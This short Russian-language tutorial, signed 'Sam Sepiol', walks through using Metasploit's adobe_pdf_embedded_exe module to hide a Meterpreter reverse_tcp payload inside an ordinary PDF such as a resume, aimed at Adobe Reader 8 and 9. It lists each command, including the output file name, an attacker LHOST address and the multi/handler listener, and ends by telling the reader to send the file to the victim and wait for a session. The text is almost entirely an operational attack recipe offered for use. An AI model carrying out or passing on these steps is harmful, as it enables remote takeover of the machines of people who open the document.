Внедрение исполняемого кода в PDF документ

Внедрение исполняемого кода в PDF документ

Sam Sepiol

Уязвимость работает в версии программы 8 и 9.

Воспользуемся поиском и найдем эксплоит:

search type:exploit embedded_exe
use exploit/windows/fileformat/adobe_pdf_embedded_exe

Установим пейлоад:

set payload windows/meterpreter/reverse_tcp
options

нас интересует:

FILENAME

INFILENAME

LAUNCH_MESSAGE

LHOST


FILENAME - выходной файл который мы можем отправить пользователю.

set filename forensics.pdf

INFILENAME - это входной файл, любой, например резюме, в формате pdf.

set infilename /root/samsep/Downloads/kniga.pdf

LAUNCH_MESSAGE - та самая уязвимость с которой мы можем изменить текст сообщения (оставляем как есть)

LHOST - ip адрес компьютера с установленным метасплоитом

set lhost 192.168.1.12
exploit


Метасплоит сгенерирует файл и покажет путь к каталогу.

Так как эксплоит сгенерировал только файл нам нужно запустить слушатель:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp

устанавливаем параметры для данного модуля:

set lhost 192.168.1.12
run

скидываем файл жертве и ждем сессию.

Документ можно закрыть он не повлияет на сессию.

Report Page